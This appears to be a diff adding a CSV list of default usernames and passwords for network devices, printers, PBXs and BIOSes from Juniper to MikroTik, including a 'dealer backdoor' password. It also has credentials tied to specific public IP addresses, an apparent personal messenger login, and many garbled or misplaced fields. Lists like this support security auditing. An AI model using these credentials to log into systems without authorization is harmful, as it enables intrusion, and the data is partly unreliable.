+juniper,Peribit,,,admin,peribit,Admin,, +juniper,ScreenOS,All,ssh or http,netscreen,netscreen,admin,, +juniper,all mode,7.6R1.9,http://118.98.171.65,,,root,administrator juniper, +justin hagstrom,AutoIndex,,1.3.2,admin,admin,,, +justin hagstrom,AutoIndex,,1.3.2,test,test,,, +justinhagstrom,AutoIndex,1.3.2,,admin,admin,Admin,, +justinhagstrom,AutoIndex,1.3.2,,test,test,,, +kalatel,Calibur DSR-2000e,,Multi,,3477,Admin,, +kalatel,Calibur DSR-2000e,,on-screen menu system,,8111,restore factory defaults,, +kaptest,usmle,,,admin,,,, +kaptest,usmle,,Admin,admin,,,, +kaptest,usmle,,HTTP,admin,,Admin,, +kethinov,Kboard Forum,,0.3.x,root,password,,, +kethinov,Kboard Forum,0.3.x,SQL,root,password,Admin,, +keyscan,Keyscan System V,,admin,keyscan,KEYSCAN,,, +keyscan,Keyscan System V,5.2,Console,keyscan,KEYSCAN,admin,, +konica minolta,7255,,admin,,sysadm,,, +konicaminolta,1690MF,1.0,web,,sysAdmin,root,, +konicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is "administrator" fully spelled out all lower case., +konicaminolta,4650,,HTTP,admin,administrator,admin,, +konicaminolta,7216,7216,http,,sysadm,Admin,, +konicaminolta,7255,,Multi,,sysadm,admin,, +konicaminolta,BIZHUB 7272 / IP-511A,Type A,IP,,sysadm,admin,, +konicaminolta,BizHUB 160(f),,HTTP,N/A,sysadm,,, +konicaminolta,Bizhub C10,,http,,MagiMFP,Admin,, +konicaminolta,Bizhub C20,,,,000000,,, +konicaminolta,C20,,http://xxx.xxx.xxx.xxx,Administrator,Administrator,from the login webpage,, +konicaminolta,C253,,Console,,12345678,admin,Tried what was listed at url and it worked on device :http://www.fixya.com/support/t888192-konica_minolta_bizbub_c253, +konicaminolta,C350,,,,00000000,,often either 00000000 or 12345678 on all KM printers, +konicaminolta,C352,,console/network,,12345678,,, +konicaminolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface, +konicaminolta,Di3510,,web,,00000000,,, +konicaminolta,Di470,,Admin Panel,,0000,admin,, +konicaminolta,Magiccolor 4690MF,all,http,,sysadm,Administrator,, +konicaminolta,Magicolor 2450,,front panel,,KM2450,,, +konicaminolta,Magicolor 2530DL,,,,administrator,,, +konicaminolta,Magicolor 5450D,All versions,HTTP,admin,,,, +konicaminolta,bizhub 163/211,bizhub 163/211,http,,sysadm,administrator,, +konicaminolta,bizhub 420,,console,,12345678,,, +konicaminolta,bizhub c203,all,all,,12345678,,, +konicaminolta,magicolor 2300 DL,,Multi,,1234,Admin,, +konicaminolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product, +kragerenergibredbnd,mozilla firefoz,802.11G - 2,4ghz,BREDBÅNDKABEL,ADMIN,,11G 2, +kti,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser, +kti,KS2260,,Console,admin,123,Admin,, +kti,KS2600,,Console,admin,123456,Admin,, +kyocera,EcoLink,,7.2,,PASSWORD,,, +kyocera,EcoLink,,Admin,,PASSWORD,,, +kyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin,, +kyocera,FS- 5XXX,,http://,,admin00,,, +kyocera,FS-1020D,,HTTP,admin,,Admin,, +kyocera,FS-1020D,,HTTP,admin,admin,Admin,, +kyocera,FS-1028MFP,,http,,admin00,,, +kyocera,FS-1128MFP,,,,admin00,,, +kyocera,FS-1350DN,,http://,,admin00,,, +kyocera,FS-3920DN,,Web,,admin00,,, +kyocera,FS-4020 DN,,HTTP,/,admin00,,, +kyocera,FS-C5100DN,,http,,admin00,,, +kyocera,FS3140MFP,,Web Interface,,admin00,Administrator,, +kyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin,, +kyocera,KR2,,http,,read notes,,it is the last 6 characters of the mac address, +kyocera,TASKalfa 250ci,,IP,,admin00,,, +kyocera,TaskAlfa 520i,All versions,Console,5200,5200,Machine Administrator,, +kyocera,Taskalfa i300,,web-access/tray,admin00/3000,admin00/3000,admin,, +kyocera,Telnet Server IB-20/21,,,root,root,,, +kyocera,Telnet Server IB-20/21,,Admin,root,root,,, +kyocera,Telnet Server IB-20/21,,multi,root,root,Admin,, +lacie,2Big Network,,,admin,admin,admin console,, +lacie,Ethernet Big Disk,,ftp://EthernetBD,admin,admin,Big Disk Administration,, +lacie,Ethernet Disk Mini 500GB,,,admin,admin,Admin,, +lacie,Ethernet Disk Mini,all sizes,http://edmini,admin,admin,Administrator's Console,, +lacie,Ethernet Disk RAID,1.4,HTTP,admin,storage,Manager console,, +lacie,Ethernet Disk,,multi,,admin,Administrator password,, +lacie,Ethernet Disk,,multi,myuser,myuser,Default user has access to default public folder,, +lacie,lacie ethernet Disk,,,administrator,admin,,, +lancom,IL11,,Multi,,,Admin,, +lanier,5618,,,,sysadm,,, +lanier,5618,,Multi,,sysadm,,, +lanier,LD120d,,web,Administrator,password,admin,, +lanier,mpc 2500,1.,Deault ip,admin,LEAVE ME BLANK,,, +lantronics,Lantronics Terminal Server,,,,access,,, +lantronics,Lantronics Terminal Server,,Admin,,access,,, +lantronics,Lantronics Terminal Server,,Admin,,system,,, +lantronix,ETS16P,,,,,,, +lantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS16PR,,,,,,, +lantronix,ETS32PR,,,,,,, +lantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS422PR,,,,,,, +lantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS4P,,,,,,, +lantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system, +lantronix,LPS1-T Print Server,,,any,system,,j11-16, +lantronix,LSB4,,,any,system,,any, +lantronix,Lantronix Terminal,,,,lantronix,,, +lantronix,Lantronix Terminal,,Admin,,lantronix,,, +lantronix,SCS100,,,,access,,, +lantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system, +lantronix,SCS1620,,,sysadmin,PASS,,, +lantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF, +lantronix,SCS200,,,,admin,,, +lantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system, +lantronix,SCS3200,,,login,access,,, +lantronix,SCS3200,,,login,access,Admin,secondary port settings login: root password: system, +lantronix,SCS400,,,,admin,,, +lantronix,SCS400,,Multi,,admin,Admin,secondary priv. password: system, +lantronix,SecureLinux Console Manager (SLC),,http/ssh,sysadmin,PASS,Admin,, +lantronix,Terminal Server,,TCP 7000,,access,Admin,, +lantronix,Terminal Server,,TCP 7000,,lantronix,Admin,, +latisnetwork,border guard,,Multi,,,Admin,, +leading edge,PC BIOS,,,,MASTER,,, +leading edge,PC BIOS,,Admin,,MASTER,,, +leadingedge,PC BIOS,,Console,,MASTER,Admin,, +lenel,OnGuard,,http - tcp 9999,admin,admin,Admin,, +level1,WAP_002,,,admin,admin,Administrator,, +lg,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password, +lg,LAM200E / LAM200R,,Multi,admin,epicrouter,Admin,, +lg,LAM200E / LAM200R,,Multi,admin,epicrouter,admin,, +lg,lsp340,,,,6278,,, +lgic,Goldstream,,,LR-ISDN,LR-ISDN,,, +lgic,Goldstream,,2.5.1,LR-ISDN,LR-ISDN,,, +lgic,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,,, +linksys,2700v ADSL Router,,,,epicrouter,Admin,, +linksys,ADSL Router,,2700v,,epicrouter,,, +linksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin,, +linksys,AP 1120,,Multi,,,Admin,, +linksys,BEFSR41,,,,admin,,, +linksys,BEFSR41,2,HTTP,,admin,Admin,, +linksys,BEFSR7(1) OR (4),,,blank,admin,,, +linksys,BEFSR81,,http://192.168.0.1,admin,password,Administration,, +linksys,BEFW11S4 Router,,,,admin,,, +linksys,BEFW11S4,,1,admin,,,, +linksys,BEFW11S4,,Admin,admin,,,, +linksys,BEFW11S4,1,HTTP,admin,,Admin,, +linksys,BEFW11S4,4,http://192.168.1.245,,,,, +linksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp, +linksys,DSL,,,,admin,,, +linksys,DSL,,Admin,,admin,,, +linksys,DSL,,Telnet,,admin,Admin,, +linksys,E3000,,,admin,admin,,, +linksys,E3000,,192.168.1.1,admin,admin,admin,, +linksys,EF1324,,multi,admin,,,, +linksys,EF1704,,multi,admin,,,, +linksys,EFG250,,,admin,admin,,, +linksys,EFG250,2,HTTP,admin,admin,,, +linksys,EtherFast Cable/DSL ROuter,,,Administrator,admin,,, +linksys,EtherFast Cable/DSL ROuter,,Admin,Administrator,admin,,, +linksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin,, +linksys,EtherFast Cable/DSL Router,,,admin,,,, +linksys,EtherFast Cable/DSL Router,,Admin,admin,,,, +linksys,EtherFast Cable/DSL Router,,HTTP,admin,,Admin,, +linksys,Linksys Router DSL/Cable,,,,admin,,, +linksys,Linksys Router DSL/Cable,,Admin,,admin,,, +linksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin,, +linksys,PC22224,1.0,multi,admin,,Admin,, +linksys,PC22604,1.0,multi,admin,,Admin,, +linksys,PSUS4 USB Print Server,,,admin,admin,Administrator,, +linksys,RT31P2,,http://192.168.15.1,,admin,Administration,, +linksys,RT31P2-AT,,http://192.168.15.1,,admin,Administration,, +linksys,RTP300 w/2 phone ports,1,http://192.168.15.1,admin,admin,Admin,, +linksys,RTP300 w/2 phone ports,1,http://192.168.15.1,user,tivonpw,update access,use for flashing firmware, +linksys,RV0041,,http://192.168.1.1,admin,admin,Administration,, +linksys,RVS4000,,http://192.168.1.1,admin,admin,,, +linksys,SFE2000,,http,admin,,Admin,, +linksys,SFE2000,,http,l1_admin,,Admin,, +linksys,SFE2000P,,http,admin,,Admin,, +linksys,SFE2000P,,http,l1_admin,,Admin,, +linksys,SGE2000,,http,admin,,Admin,, +linksys,SGE2000,,http,l1_admin,,Admin,, +linksys,SGE2000P,,http,admin,,Admin,, +linksys,SGE2000P,,http,l1_admin,,Admin,, +linksys,SPA400,,http,Admin,,Admin,, +linksys,SPA9000,,http,Admin,,Admin,, +linksys,SRW2008,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2008MP,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2008P,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2016,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2024,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2048,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208G,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208L,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208MP,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208P,,http://192.168.1.254,admin,,Admin,, +linksys,SRW224,,http://192.168.1.254,admin,,Admin,, +linksys,SRW224G4,,http://192.168.1.254,admin,,Admin,, +linksys,SRW248G4,,http://192.168.1.254,admin,,Admin,, +linksys,SVR200,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR200,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR200,,,(username),3+(extension),User Access,, +linksys,SVR200,,,,3450,Operator voicemailbox,, +linksys,SVR200,,,,498,Autoattendant,, +linksys,SVR3000,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR3000,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR3000,,,(username),3+(extension),User Access,, +linksys,SVR3000,,,,3450,Operator voicemailbox,, +linksys,SVR3000,,,,498,Autoattendant,, +linksys,SVR3500,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR3500,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR3500,,,(username),3+(extension),User Access,, +linksys,SVR3500,,,,3450,Operator voicemailbox,, +linksys,SVR3500,,,,498,Autoattendant,, +linksys,WAG54G,,HTTP,admin,admin,Admin,, +linksys,WAG54GS,,Multi,admin,admin,Admin,, +linksys,WAP Router,,4 Port 2.4GHz,,admin,,, +linksys,WAP11,,,admin,admin,,, +linksys,WAP11,,Multi,,,Admin,, +linksys,WAP200,,http://192.168.1.245,,admin,Admin,, +linksys,WAP4400N,,http://192.168.1.245,,admin,Admin,, +linksys,WAP4400N,business series,192.168.1.245,admin,admin,admin,, +linksys,WAP44OON,2,4-GHZ,http://192.168.1.245,Admin,Admin,, +linksys,WAP51AB,,console,,Admin,Admin,, +linksys,WAP54A,,http://192.168.1.252,,admin,Web-Based Config Utility,, +linksys,WAP54G Router,,http://192.168.1.245,,admin,,, +linksys,WAP54G,,,,admin,,, +linksys,WAP54G,2,http://192.168.1.245,,admin,Admin,, +linksys,WAP54GP,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GPE,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GX,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GX,1.0,web ,,admin,192.168.1.245,There is no username; it will not work if you connect with a username., +linksys,WAP55AG,1.0, 2.0 ,http://192.168.1.246,,admin,, +linksys,WCG200,,http://192.168.0.1,,admin,Administration,, +linksys,WET11,,,,admin,Admin,, +linksys,WET54G,,,,admin,Admin,, +linksys,WGA11B,,,,admin,Admin,, +linksys,WMB54G,,,,admin,Admin,, +linksys,WRK54G Router,,,,admin,,, +linksys,WRT160n,V2,http://192.168.1.1,admin,admin,admin,, +linksys,WRT300N,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54G Router,,,,admin,,, +linksys,WRT54G v4,2.4,http:192.168.1.245,,admin,,, +linksys,WRT54G,,Admin,admin,admin,,, +linksys,WRT54G,,HTTP,admin,admin,Admin,, +linksys,WRT54G,2.4,http:192.168.1.245,,admin,,, +linksys,WRT54GC,,,admin,admin,,, +linksys,WRT54GC,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GL,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GP2,,http://192.168.15.1,,admin,Administration,, +linksys,WRT54GP2A-AT,,http://192.168.15.1,,admin,Administration,, +linksys,WRT54GR,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GS Router,,,,admin,,, +linksys,WRT54GS,,Admin,admin,admin,,, +linksys,WRT54GS,1.1,HTTP,admin,admin,Admin,, +linksys,WRT54GX,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GX2,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GX4,,http://192.168.1.1,,admin,Administration,, +linksys,WRT55AG Router,,,,admin,,, +linksys,WRTP54G-ER,,http://192.168.15.1,admin,admin,Admin,, +linksys,WRTSL54GS,,http://192.168.1.1,,admin,Administration,, +linksys,WRV54G,,,admin,admin,,, +linksys,WRV54G,,Multi,admin,admin,,, +linksys,WTR54GS,,http://192.168.16.1,,admin,Administration,, +linksys,wrt110,,admin,admin,admin,,, +linunx,Linux,,,Administrator,admin,,, +linux,Slackware,,,gonzo,,,, +linux,Slackware,,,satan,,,, +linux,Slackware,,,snake,,,, +linux,Slackware,,Multi,gonzo,,User,, +linux,Slackware,,Multi,satan,,User,, +linux,Slackware,,Multi,snake,,User,, +linux,Slackware,,User,gonzo,,,, +linux,Slackware,,User,satan,,,, +linux,Slackware,,User,snake,,,, +linux,UCLinux for UCSIMM,,,root,uClinux,,, +linux,UCLinux for UCSIMM,,Admin,root,uClinux,,, +linux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin,, +linux,back trak,3 and 4,,root,toor,,penetration version hacking WiFi, +livingston,IRX Router,,,!root,,,, +livingston,IRX Router,,Telnet,!root,,,, +livingston,Livingston Portmaster 3,,,!root,,,, +livingston,Officerouter,,,!root,,,, +livingston,Officerouter,,,!root,blank,,, +livingston,Officerouter,,Telnet,!root,,,, +livingston,Portmaster 2R,,Telnet,root,,Admin,, +livingston,Portmaster 3,,Telnet,!root,,,, +livingston,Portmaster,2/3,,!root,blank,,, +livingstone,Portmaster 2R,,,root,,,, +livingstone,Portmaster 2R,,Admin,root,,,, +lockdownnetworks,All Lockdown Products,up to 2.7,Console,setup,changeme(exclamation),User,, +logitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,, +longshine,isscfg,,HTTP,admin,0,Admin,, +lucent,AP-1000,,,public,public,,, +lucent,Anymedia,,,LUCENT01,UI-PSWD-01,,, +lucent,Anymedia,,,LUCENT02,UI-PSWD-02,,, +lucent,Anymedia,,Admin,LUCENT01,UI-PSWD-01,,, +lucent,Anymedia,,Admin,LUCENT02,UI-PSWD-02,,, +lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software, +lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software, +lucent,B-STDX9000,,,(any 3 characters),cascade,,, +lucent,B-STDX9000,,,,cascade,,, +lucent,B-STDX9000,,Multi,(any 3 characters),cascade,,, +lucent,B-STDX9000,,SNMP readwrite,,cascade,,, +lucent,B-STDX9000,,all,,cascade,,, +lucent,B-STDX9000,,debug mode,,cascade,,, +lucent,B-STDX9000,all,SNMP,,cascade,Admin,, +lucent,CBX 500,,,(any 3 characters),cascade,,, +lucent,CBX 500,,,,cascade,,, +lucent,CBX 500,,Multi,(any 3 characters),cascade,,, +lucent,CBX 500,,SNMP readwrite,,cascade,,, +lucent,CBX 500,,debug mode,,cascade,,, +lucent,Cajun Family,,,root,root,,, +lucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin,, +lucent,GX 550,,,(any 3 characters),cascade,,, +lucent,GX 550,,,,cascade,,, +lucent,GX 550,,Multi,(any 3 characters),cascade,,, +lucent,GX 550,,SNMP readwrite,,cascade,,, +lucent,GX 550,,debug mode,,cascade,,, +lucent,M770,,Telnet,super,super,Admin,, +lucent,MAX-TNT,,,admin,Ascend,,, +lucent,MAX-TNT,,Multi,admin,Ascend,,, +lucent,Max TNT,,9.1.3,,admin,,, +lucent,PSAX 1200 and below,,,root,ascend,,, +lucent,PSAX 1200 and below,,Multi,root,ascend,,, +lucent,PSAX 1250 and above,,,readonly,lucenttech2,,, +lucent,PSAX 1250 and above,,,readwrite,lucenttech1,,, +lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,,, +lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin,, +lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,,, +lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin,, +lucent,PacketStar,,Multi,Administrator,,Admin,, +lucent,Packetstar (PSAX),,,readwrite,lucenttech1,,, +lucent,Portmaster 2,,,!root,,,, +lucent,Portmaster 3,,,!root,!ishtar,,unknown, +lucent,Stinger,,,admin,Ascend,,, +lucent,System 75,,,bciim,bciimpw,,, +lucent,System 75,,,bcim,bcimpw,,, +lucent,System 75,,,bcms,bcmspw,,, +lucent,System 75,,,bcnas,bcnaspw,,, +lucent,System 75,,,blue,bluepw,,, +lucent,System 75,,,browse,browsepw,,, +lucent,System 75,,,browse,looker,,, +lucent,System 75,,,craft,craft,,, +lucent,System 75,,,craft,craftpw,,, +lucent,System 75,,,cust,custpw,,, +lucent,System 75,,,enquiry,enquirypw,,, +lucent,System 75,,,field,support,,, +lucent,System 75,,,inads,inads,,, +lucent,System 75,,,inads,indspw,,, +lucent,System 75,,,init,initpw,,, +lucent,System 75,,,locate,locatepw,,, +lucent,System 75,,,maint,maintpw,,, +lucent,System 75,,,maint,rwmaint,,, +lucent,System 75,,,nms,nmspw,,, +lucent,System 75,,,pw,pwpw,,, +lucent,System 75,,,rcust,rcustpw,,, +lucent,System 75,,,support,supportpw,,, +lucent,System 75,,,sysadm,sysadmpw,,, +lucent,System 75,,,tech,field,,, +lucent,System 75,,Multi,bciim,bciimpw,,, +lucent,System 75,,Multi,bcim,bcimpw,,, +lucent,System 75,,Multi,bcms,bcmspw,,, +lucent,System 75,,Multi,bcnas,bcnaspw,,, +lucent,System 75,,Multi,blue,bluepw,,, +lucent,System 75,,Multi,browse,browsepw,,, +lucent,System 75,,Multi,browse,looker,,, +lucent,System 75,,Multi,craft,craft,,, +lucent,System 75,,Multi,craft,craftpw,,, +lucent,System 75,,Multi,cust,custpw,,, +lucent,System 75,,Multi,enquiry,enquirypw,,, +lucent,System 75,,Multi,field,support,,, +lucent,System 75,,Multi,inads,inads,,, +lucent,System 75,,Multi,inads,indspw,,, +lucent,System 75,,Multi,init,initpw,,, +lucent,System 75,,Multi,locate,locatepw,,, +lucent,System 75,,Multi,maint,maintpw,,, +lucent,System 75,,Multi,maint,rwmaint,,, +lucent,System 75,,Multi,nms,nmspw,,, +lucent,System 75,,Multi,pw,pwpw,,, +lucent,System 75,,Multi,rcust,rcustpw,,, +lucent,System 75,,Multi,support,supportpw,,, +lucent,System 75,,Multi,sysadm,admpw,,, +lucent,System 75,,Multi,sysadm,sysadmpw,,, +lucent,System 75,,Multi,sysadm,syspw,,, +lucent,System 75,,Multi,tech,field,,, +luxoncommunications,IP Phone,,http,administrator,19750407,Admin,, +m technology,PC BIOS,,,,mMmM,,, +m technology,PC BIOS,,Admin,,mMmM,,, +machspeed,PC BIOS,,,,sp99dd,,, +machspeed,PC BIOS,,Admin,,sp99dd,,, +machspeed,PC BIOS,,Console,,sp99dd,Admin,, +macromedia,Dreamweaver,,,,admin,,, +macromedia,Dreamweaver,,FTP,,admin,Guest,, +macromedia,Dreamweaver,,Guest,,admin,,, +macsense,X-Router Pro,,,admin,admin,,, +magic-pro,PC BIOS,,,,prost,,, +magic-pro,PC BIOS,,Admin,,prost,,, +magicpro,PC BIOS,,Console,,prost,Admin,, +main street softworks,MCVE,,2.5,MCVEADMIN,password,,, +main street softworks,MCVE,,Admin,MCVEADMIN,password,,, +mainstreetsoftworks,MCVE,2.5,Multi,MCVEADMIN,password,Admin,, +mambo,Site Server,,4.x,admin,admin,,, +mambo,Site Server,4.x,HTTP,admin,admin,Admin,, +mantis,Mantis,,,administrator,root,,, +mantis,Mantis,,,administrator,root,Admin,, +manufactor,Product,,Access_Validated,User,Password,,, +marconi,Fore ATM Switches,,,ami,,,, +marconi,Fore ATM Switches,,Admin,ami,,,, +marconi,Fore ATM Switches,,Multi,ami,,Admin,, +maxdata,ms2137,,Multi,,,Admin,, +mcafee,3100,4.x, 5.x,local, ssh,root,root, +mcafee,IntruShield IPS Sensor,,,admin,admin123,,, +mcafee,IntruShield IPS Sensor,1.8,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,1.9,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,2.1,SSH,admin,admin123,,, +mcafee,IntruShield IPS Sensor,3.1,SSH,admin,admin123,,, +mcafee,IntruShield Manager,,,admin,admin123,,, +mcafee,IntruShield Manager,1.8,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,1.9,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,2.1,HTTP,admin,admin123,,, +mcafee,IntruShield Manager,3.1,HTTP,admin,admin123,,, +mcafee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin,, +mcafee,SCM 3200,,http,scmadmin,changeme,Admin,, +mcafee,e250,,,webshield,webshieldchangeme,,, +mcafee,e250,,HTTP,webshield,webshieldchangeme,,, +mcdata,FC Switches/Directors,,Multi,Administrator,password,Admin,, +mediatrix,2102,,http://x.x.x.x:8080,root,5678,,, +mediatrix2102,,,http://192.168.1.102,admin,1234,,, +mediatrix2102,mediatrix 2102,,HTTP,admin,1234,Admin,, +medion,Routers,,HTTP,,medion,Admin,, +megastar,BIOS,,Console,,star,Admin,, +megastar,PC BIOS,,,,star,,, +megastar,PC BIOS,,Admin,,star,,, +megastar,PC BIOS,,Console,,star,Admin,, +melco,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default, +memotec,CX Line,,Console,memotec,supervisor,,, +memotec,CX Line,Any,Multi,memotec,supervisor,Console,, +mentec,Micro/RSX,,,MICRO,RSX,,, +mentec,Micro/RSX,,,MICRO,RSX,Admin,, +mentec,Micro/RSX,,Admin,MICRO,RSX,,, +mentec,Micro/RSX,,Multi,MICRO,RSX,Admin,, +mercury interactive,Topaz Prism,,,admin,admin,,, +mercury,234234,,234234,Administrator,admin,,, +mercury,234234,,Admin,Administrator,admin,,, +mercury,234234,234234,SNMP,Administrator,admin,Admin,, +mercury,KT133A/686B,,,Administrator,admin,,, +mercury,KT133A/686B,,Admin,Administrator,admin,,, +mercury,KT133A/686B,,SNMP,Administrator,admin,Admin,, +mercury,Topaz Prism,,http,admin,admin,Admin,, +meridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems., +metro,phone,,voicemail,client,client,,, +michiel,PHPList,2.6.4,http,admin,phplist,Admin,, +michiel,PHPlist,,2.6.4,admin,phplist,,, +micro soft,yahoo messenger,,,sherzad420,pakistan,,, +microcom,ADSL Routers,,,admin,epicrouter,Admin,, +microcom,ADSL Routers,,,user,password,Admin,, +microcom,Unknown,,,admin,superuser,,, +microcom,hdms,,,system,hdms,,unknown, +micron,PC BIOS,,,,sldkj754,,, +micron,PC BIOS,,,,xyzall,,, +micron,PC BIOS,,Admin,,sldkj754,,, +micron,PC BIOS,,Admin,,xyzall,,, +micron,PC BIOS,,Console,,sldkj754,Admin,, +micron,PC BIOS,,Console,,xyzall,Admin,, +micronet,3351 / 3354,,Multi,admin,epicrouter,Admin,, +micronet,Access Point,,Admin,root,default,,, +micronet,Access Point,,SP912,root,default,,, +micronet,SP3356,,,admin,epicrouter,,, +micronet,SP3356,,HTTP,admin,epicrouter,,, +micronet,SP3357,,HTTP,admin,epicrouter,admin,, +micronet,SP3357,,admin,admin,epicrouter,,, +micronet,SP5002,,Console,mac,,Admin,, +micronet,SP912 Access Point,,Telnet,root,default,Admin,, +micronet,SP916BM Wireless Broadband Router,,http,admin,admin,Admin,, +micronet,SP916GK,V2,HTTP,admin,,Admin,, +micronet,Wireless Broadband Router,,SP916BM,admin,admin,,, +micronics,PC BIOS,,,,dn_04rjc,,, +micronics,PC BIOS,,Admin,,dn_04rjc,,, +micronics,PC BIOS,,Console,,dn_04rjc,Admin,, +microplex,Print Server,,,root,root,,, +microplex,Print Server,,Admin,root,root,,, +microplex,Print Server,,Telnet,root,root,Admin,, +microrouter,900i,,,,letmein,,, +microrouter,900i,,Admin,,letmein,,, +microrouter,900i,,Console/Multi,,letmein,Admin,, +microsoft,200 server,,,,,,, +microsoft,Great Plains,,,LessonUser1,,,, +microsoft,Great Plains,,,LessonUser2,,,, +microsoft,Great Plains,All,Multi,LessonUser1,,,, +microsoft,Great Plains,All,Multi,LessonUser2,,,, +microsoft,MN-100,,http://192.168.2.1,,admin,Administration,, +microsoft,MN-500,,http://192.168.2.1,,admin,Administration,, +microsoft,MN-700,,http://192.168.2.1,,admin,Administration,, +microsoft,MN500 Base Station,,,,admin,Admin,, +microsoft,MN700 Wireless AP/Router,,,MSHOME,MSHOME,,, +microsoft,NT,,,,start,,, +microsoft,NT,,,free user,user,,4, +microsoft,SQL Server 2000,,SP3,sa,,,, +microsoft,SQL Server,,,,sa,,, +microsoft,SQL Server,,7,sa,,,, +microsoft,SQL Server,,Admin,sa,,,, +microsoft,SQL Server,7,Multi,sa,,Admin,, +microsoft,SiteServer,,3.x,LDAP_Anonymous,LdapPassword_1,,, +microsoft,SiteServer,3.x,http,LDAP_Anonymous,LdapPassword_1,,, +microsoft,Windows NT,,,,,,, +microsoft,Windows NT,,,Administrator,,,, +microsoft,Windows NT,,,Administrator,,,All, +microsoft,Windows NT,,,Administrator,Administrator,,, +microsoft,Windows NT,,,Guest,,,All, +microsoft,Windows NT,,,Guest,Guest,,, +microsoft,Windows NT,,,IS_$hostname,(same),,, +microsoft,Windows NT,,,Mail,,,All, +microsoft,Windows NT,,,User,User,,, +microsoft,Windows NT,,,pkoolt,pkooltPS,,4, +microsoft,Windows NT,,Admin,Administrator,,,, +microsoft,Windows NT,,Admin,Administrator,Administrator,,, +microsoft,Windows NT,,Multi,Administrator,,Admin,, +microsoft,Windows NT,,Multi,Administrator,Administrator,Admin,, +microsoft,Windows NT,,Multi,Guest,,User,, +microsoft,Windows NT,,Multi,Guest,Guest,User,, +microsoft,Windows NT,,Multi,IS_$hostname,(same),User,hostname is your servername, +microsoft,Windows NT,,Multi,User,User,User,, +microsoft,Windows NT,,User,Guest,,,, +microsoft,Windows NT,,User,Guest,Guest,,, +microsoft,Windows NT,,User,IS_$hostname,(same),,, +microsoft,Windows NT,,User,User,User,,, +microsoft,Windows Storage Server 2008,,,Administrator,wSS2008!,,, +mike peters,BasiliX,,1.1.1,bsxuser,bsxpass,,, +mikepeters,BasiliX,1.1.1,sql,bsxuser,bsxpass,Admin,, +mikrotik,,2.27,,admin,,172.16.11.1,, +mikrotik,,2.9.27,,admin,admin,,, +mikrotik,,2.9.27,http://10.0.0.138,admin,,,, +mikrotik,,3.20,192.168.2.2,admin,0111313071,,MikroTik, +mikrotik,,MikroTik v3.25,telnet,admin,admin,root,hello, +mikrotik,MKE-3.28, 3.28 ,http://189.150.32.11/,admin,admin,root,, +mikrotik,MicroTik,2.9.27,,admin,123,,, +mikrotik,Mikrotik,2.95,,multilink,,,, +mikrotik,Mikrotik2.9.42 windows xp,2.9.42,,admin,admin,admin,, +mikrotik,Router OS,2.9.17,HTTP,admin,,Admin,, +mikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access, +mikrotik,Windows XP,3.2,10.15.113.1,admin,admin,,, +mikrotik,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,admin,admin,admin,admin, +mikrotik,wbr-2310,1.0,192.168.7.103,admin,,admin,, 